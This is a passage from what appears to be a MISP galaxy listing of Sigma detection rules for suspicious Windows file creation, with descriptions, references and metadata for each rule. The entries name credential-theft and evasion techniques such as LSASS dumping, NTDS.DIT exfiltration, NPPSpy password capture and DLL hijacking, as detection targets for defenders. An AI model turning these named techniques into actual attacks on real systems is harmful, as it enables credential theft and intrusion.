UUID 6902955a-01b7-432c-b32a-6f5f81d8f625 which can be used as unique global reference for LSASS Process Dump Artefact In CrashDumps Folder in MISP communities and other software using the MISP galaxy
External references
- https://github.com/deepinstinct/Lsass-Shtinkering - webarchive
- https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @pbssubhash |
| creation_date | 2022-12-08 |
| falsepositive | ['Rare legitimate dump of the process by the operating system due to a crash of lsass'] |
| filename | file_event_win_lsass_shtinkering.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
Wmiexec Default Output File
Detects the creation of the default output filename used by the wmiexec tool
Internal MISP references
UUID 8d5aca11-22b3-4f22-b7ba-90e60533e1fb which can be used as unique global reference for Wmiexec Default Output File in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/ - webarchive
- https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-02 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_wmiexec_default_filename.yml |
| level | critical |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.execution', 'attack.t1047'] |
ISO File Created Within Temp Folders
Detects the creation of an ISO file in the Outlook temp folder or in the AppData temp folder. Typical of Qakbot TTPs from end-July 2022.
Internal MISP references
UUID 2f9356ae-bf43-41b8-b858-4496d83b2acb which can be used as unique global reference for ISO File Created Within Temp Folders in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/Sam0x90/status/1552011547974696960 - webarchive
- https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @sam0x90 |
| creation_date | 2022-07-30 |
| falsepositive | ['Potential FP by sysadmin opening a zip file containing a legitimate ISO file'] |
| filename | file_event_win_iso_file_mount.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.initial-access', 'attack.t1566.001'] |
Drop Binaries Into Spool Drivers Color Folder
Detects the creation of suspicious binary files inside "\windows\system32\spool\drivers\color\" as seen in the blog referenced below
Internal MISP references
UUID ce7066a6-508a-42d3-995b-2952c65dc2ce which can be used as unique global reference for Drop Binaries Into Spool Drivers Color Folder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-28 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_spool_drivers_color_drop.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Suspicious File Drop by Exchange
Detects a suspicious file type dropped by an Exchange component in IIS
Internal MISP references
UUID 6b269392-9eba-40b5-acb6-55c882b20ba6 which can be used as unique global reference for Suspicious File Drop by Exchange in MISP communities and other software using the MISP galaxy
External references
- https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html - webarchive
- https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html - webarchive
- https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-10-04 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_exchange_webshell_drop_suspicious.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1190', 'attack.initial-access', 'attack.t1505.003'] |
LiveKD Driver Creation
Detects the creation of the LiveKD driver, which is used for live kernel debugging
Internal MISP references
UUID 16fe46bb-4f64-46aa-817d-ff7bec4a2352 which can be used as unique global reference for LiveKD Driver Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-16 |
| falsepositive | ['Legitimate usage of LiveKD for debugging purposes will also trigger this'] |
| filename | file_event_win_sysinternals_livekd_driver.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation'] |
HackTool - Dumpert Process Dumper Default File
Detects the creation of the default dump file used by the Outflank Dumpert tool, a process dumper that dumps the lsass process memory
Internal MISP references
UUID 93d94efc-d7ad-4161-ad7d-1638c4f908d8 which can be used as unique global reference for HackTool - Dumpert Process Dumper Default File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2020-02-04 |
| falsepositive | ['Very unlikely'] |
| filename | file_event_win_hktl_dumpert.yml |
| level | critical |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
ADSI-Cache File Creation By Uncommon Tool
Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
Internal MISP references
UUID 75bf09fa-1dd7-4d18-9af9-dd9e492562eb which can be used as unique global reference for ADSI-Cache File Creation By Uncommon Tool in MISP communities and other software using the MISP galaxy
External references
- https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961 - webarchive
- https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/ - webarchive
- https://github.com/fox-it/LDAPFragger - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | xknow @xknow_infosec, Tim Shelton |
| creation_date | 2019-03-24 |
| falsepositive | ['Other legitimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.'] |
| filename | file_event_win_adsi_cache_creation_by_uncommon_tool.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.t1001.003', 'attack.command-and-control'] |
HackTool - Impacket File Indicators
Detects file creation events with filename patterns used by Impacket.
Internal MISP references
UUID 03f4ca17-de95-428d-a75a-4ee78b047256 which can be used as unique global reference for HackTool - Impacket File Indicators in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | The DFIR Report, IrishDeath |
| creation_date | 2025-05-19 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_impacket_file_indicators.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
Office Macro File Creation
Detects the creation of new Office macro files on the system
Internal MISP references
UUID 91174a41-dc8f-401b-be89-7bfc140612a0 which can be used as unique global reference for Office Macro File Creation in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md - webarchive
- https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_created.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-01-23 |
| falsepositive | ['Very common in environments that rely heavily on macro documents'] |
| filename | file_event_win_office_macro_files_created.yml |
| level | low |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.initial-access', 'attack.t1566.001'] |
ADExplorer Writing Complete AD Snapshot Into .dat File
Detects the dual-use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for BloodHound, usernames for password spraying, or metadata for social engineering. The snapshot doesn't contain password hashes, but there have been cases where administrators put passwords in the comment field.
Internal MISP references
UUID 0a1255c5-d732-4b62-ac02-b5152d34fb83 which can be used as unique global reference for ADExplorer Writing Complete AD Snapshot Into .dat File in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/de-de/sysinternals/downloads/adexplorer - webarchive
- https://trustedsec.com/blog/adexplorer-on-engagements - webarchive
- https://github.com/c3c/ADExplorerSnapshot.py/tree/f700904defac330802bbfedd1d8ffd9248f4ee24 - webarchive
- https://www.nccgroup.com/us/research-blog/lapsus-recent-techniques-tactics-and-procedures/ - webarchive
- https://www.packetlabs.net/posts/scattered-spider-is-a-young-ransomware-gang-exploiting-large-corporations/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_adexplorer_dump_written.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Arnim Rupp (Nextron Systems), Thomas Patzke |
| creation_date | 2025-07-09 |
| falsepositive | ['Legitimate use of ADExplorer by administrators creating .dat snapshots'] |
| filename | file_event_win_sysinternals_adexplorer_dump_written.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1087.002', 'attack.t1069.002', 'attack.t1482'] |
Potential Privilege Escalation Attempt Via .Exe.Local Technique
Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
Internal MISP references
UUID 07a99744-56ac-40d2-97b7-2095967b0e03 which can be used as unique global reference for Potential Privilege Escalation Attempt Via .Exe.Local Technique in MISP communities and other software using the MISP galaxy
External references
- https://github.com/binderlabs/DirCreate2System - webarchive
- https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash) |
| creation_date | 2022-12-16 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_system32_local_folder_privilege_escalation.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence', 'attack.privilege-escalation'] |
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
Detects the creation of a hidden file/folder with the "::$index_allocation" stream, which can be used as a technique to prevent access to folders and files from tooling such as "explorer.exe" and "powershell.exe"
Internal MISP references
UUID a8f866e1-bdd4-425e-a27a-37619238d9c7 which can be used as unique global reference for Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/pfiatde/status/1681977680688738305 - webarchive
- https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/ - webarchive
- https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation - webarchive
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Scoubi (@ScoubiMtl) |
| creation_date | 2023-10-09 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_susp_hidden_dir_index_allocation.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1564.004'] |
Suspicious Get-Variable.exe Creation
Get-Variable is a valid PowerShell cmdlet. WindowsApps is by default in the path where PowerShell is executed, so when the Get-Variable command is issued on PowerShell execution, the system first looks for a Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
Internal MISP references
UUID 0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b which can be used as unique global reference for Suspicious Get-Variable.exe Creation in MISP communities and other software using the MISP galaxy
External references
- https://www.joesandbox.com/analysis/465533/0/html - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-04-23 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_get_variable.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546', 'attack.defense-evasion', 'attack.t1027'] |
WScript or CScript Dropper - File
Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
Internal MISP references
UUID 002bdb95-0cf1-46a6-9e08-d38c128a6127 which can be used as unique global reference for WScript or CScript Dropper - File in MISP communities and other software using the MISP galaxy
External references
- WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tim Shelton |
| creation_date | 2022-01-10 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_cscript_wscript_dropper.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.005', 'attack.t1059.007'] |
Suspicious Double Extension Files
Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hides file extensions by default.
Internal MISP references
UUID b4926b47-a9d7-434c-b3a0-adc3fa0bd13e which can be used as unique global reference for Suspicious Double Extension Files in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/ - webarchive
- https://twitter.com/luc4m/status/1073181154126254080 - webarchive
- https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites - webarchive
- https://vipre.com/blog/svg-phishing-attacks-the-new-trick-in-the-cybercriminals-playbook/ - webarchive
- https://twitter.com/malwrhunterteam/status/1235135745611960321 - webarchive
- https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), frack113 |
| creation_date | 2022-06-19 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_susp_double_extension.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036.007'] |
Potential Initial Access via DLL Search Order Hijacking
Detects attempts to create a DLL file in a known desktop application dependencies folder, such as those of Slack, Teams or OneDrive, by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
Internal MISP references
UUID dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c which can be used as unique global reference for Potential Initial Access via DLL Search Order Hijacking in MISP communities and other software using the MISP galaxy
External references
- https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0 - webarchive
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tim Rauch (rule), Elastic (idea) |
| creation_date | 2022-10-21 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_initial_access_dll_search_order_hijacking.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1566', 'attack.t1566.001', 'attack.initial-access', 'attack.t1574', 'attack.t1574.001', 'attack.defense-evasion'] |
Suspicious File Created Via OneNote Application
Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
Internal MISP references
UUID fcc6d700-68d9-4241-9a1a-06874d621b06 which can be used as unique global reference for Suspicious File Created Via OneNote Application in MISP communities and other software using the MISP galaxy
External references
- https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/ - webarchive
- https://labs.withsecure.com/publications/detecting-onenote-abuse - webarchive
- https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/ - webarchive
- https://twitter.com/MaD_c4t/status/1623414582382567424 - webarchive
- https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/ - webarchive
- https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-09 |
| falsepositive | ["False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", 'Occasional FPs might occur if OneNote is used internally to share different embedded documents'] |
| filename | file_event_win_office_onenote_susp_dropped_files.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Office Macro File Download
Detects the creation of new Office macro files on the system via an application (browser, mail client). This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation.
Internal MISP references
UUID 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66 which can be used as unique global reference for Office Macro File Download in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md - webarchive
- https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_downloaded.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-01-23 |
| falsepositive | ['Legitimate macro files downloaded from the internet', 'Legitimate macro files sent as attachments via emails'] |
| filename | file_event_win_office_macro_files_downloaded.yml |
| level | low |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.initial-access', 'attack.t1566.001'] |
HackTool - Powerup Write Hijack DLL
PowerUp's Write Hijack DLL exploits DLL hijacking for privilege escalation. In its default mode, it builds a self-deleting .bat file which executes a malicious command. The detection rule relies on the creation of the malicious bat file (debug.bat by default).
Internal MISP references
UUID 602a1f13-c640-4d73-b053-be9a2fa58b96 which can be used as unique global reference for HackTool - Powerup Write Hijack DLL in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Subhash Popuri (@pbssubhash) |
| creation_date | 2021-08-21 |
| falsepositive | ['Any powershell script that creates bat files'] |
| filename | file_event_win_hktl_powerup_dllhijacking.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1574.001'] |
Visual Studio Code Tunnel Remote File Creation
Detects the creation of a file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via the VsCode tunnel feature
Internal MISP references
UUID 56e05d41-ce99-4ecd-912d-93f019ee0b71 which can be used as unique global reference for Visual Studio Code Tunnel Remote File Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-10-25 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_vscode_tunnel_remote_creation_artefacts.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.command-and-control'] |
EVTX Created In Uncommon Location
Detects the creation of new files with the ".evtx" extension in non-common or non-standard locations. This could indicate tampering with default EVTX locations in order to evade security controls, or simply exfiltration of event logs to search for sensitive information within them. Note that backup software and legitimate administrators might perform similar actions during troubleshooting.
Internal MISP references
UUID 65236ec7-ace0-4f0c-82fd-737b04fd4dcb which can be used as unique global reference for EVTX Created In Uncommon Location in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | D3F7A5105 |
| creation_date | 2023-01-02 |
| falsepositive | ['Administrator or backup activity', 'An unknown bug seems to trigger the Windows "svchost" process to drop EVTX files in the "C:\Windows\Temp" directory in the form " |
| filename | file_event_win_create_evtx_non_common_locations.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.002'] |
VsCode Powershell Profile Modification
Detects the creation or modification of a VsCode-related PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence
Internal MISP references
UUID 3a9fa2ec-30bc-4ebd-b49e-7c9cff225502 which can be used as unique global reference for VsCode Powershell Profile Modification in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-24 |
| falsepositive | ['Legitimate use of the profile by developers or administrators'] |
| filename | file_event_win_susp_vscode_powershell_profile.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1546.013'] |
BloodHound Collection Files
Detects default file names outputted by the BloodHound collection tool SharpHound
Internal MISP references
UUID 02773bed-83bf-469f-b7ff-e676e7d78bab which can be used as unique global reference for BloodHound Collection Files in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | C.J. May |
| creation_date | 2022-08-09 |
| falsepositive | ['Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise'] |
| filename | file_event_win_bloodhound_collection.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.001', 'attack.t1069.002', 'attack.execution', 'attack.t1059.001'] |
HackTool - NPPSpy Hacktool Usage
Detects the use of the NPPSpy hacktool, which stores the cleartext passwords of users who logged in to a local file
Internal MISP references
UUID cad1fe90-2406-44dc-bd03-59d0b58fe722 which can be used as unique global reference for HackTool - NPPSpy Hacktool Usage in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/0gtweet/status/1465282548494487554 - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-11-29 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_hktl_nppspy.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access'] |
Suspicious Creation TXT File in User Desktop
Detects ransomware creating a TXT file on the user's Desktop.
Internal MISP references
UUID caf02a0a-1e1c-4552-9b48-5e070bd88d11 which can be used as unique global reference for Suspicious Creation TXT File in User Desktop in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-12-26 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_desktop_txt.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.impact', 'attack.t1486'] |
Related clusters
To see the related clusters, click here.
GoToAssist Temporary Installation Artefact
An adversary may use legitimate desktop support and remote access software, such as TeamViewer, Go2Assist, LogMeIn, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and TeamViewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Internal MISP references
UUID 5d756aee-ad3e-4306-ad95-cb1abec48de2 which can be used as unique global reference for GoToAssist Temporary Installation Artefact in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-02-13 |
| falsepositive | ['Legitimate use'] |
| filename | file_event_win_gotoopener_artefact.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Related clusters
To see the related clusters, click here.
Creation Of Non-Existent System DLL
Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.
Internal MISP references
UUID df6ecb8b-7822-4f4b-b412-08f524b4576c which can be used as unique global reference for Creation Of Non-Existent System DLL in MISP communities and other software using the MISP galaxy
External references
- https://decoded.avast.io/martinchlumecky/png-steganography/ - webarchive
- https://github.com/Wh04m1001/SysmonEoP - webarchive
- https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc - webarchive
- https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/ - webarchive
- https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 - webarchive
- https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), fornotes |
| creation_date | 2022-12-01 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_create_non_existent_dlls.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence', 'attack.privilege-escalation', 'attack.t1574.001'] |
Related clusters
To see the related clusters, click here.
Suspicious File Created In PerfLogs
Detects suspicious files, based on their extension, being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files.
Internal MISP references
UUID bbb7e38c-0b41-4a11-b306-d2a457b7ac2b which can be used as unique global reference for Suspicious File Created In PerfLogs in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-05 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_perflogs_susp_files.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059'] |
Related clusters
To see the related clusters, click here.
Remote Access Tool - ScreenConnect Temporary File
Detects the creation of files in a specific location by ScreenConnect RMM.
ScreenConnect has a feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\
Internal MISP references
UUID 0afecb6e-6223-4a82-99fb-bf5b981e92a5 which can be used as unique global reference for Remote Access Tool - ScreenConnect Temporary File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Ali Alwashali |
| creation_date | 2023-10-10 |
| falsepositive | ['Legitimate use of ScreenConnect'] |
| filename | file_event_win_remote_access_tools_screenconnect_remote_file.yml |
| level | low |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.003'] |
Related clusters
To see the related clusters, click here.
NTDS Exfiltration Filename Patterns
Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
Internal MISP references
UUID 3a8da4e0-36c1-40d2-8b29-b3e890d5172a which can be used as unique global reference for NTDS Exfiltration Filename Patterns in MISP communities and other software using the MISP galaxy
External references
- https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1 - webarchive
- https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb - webarchive
- https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405 - webarchive
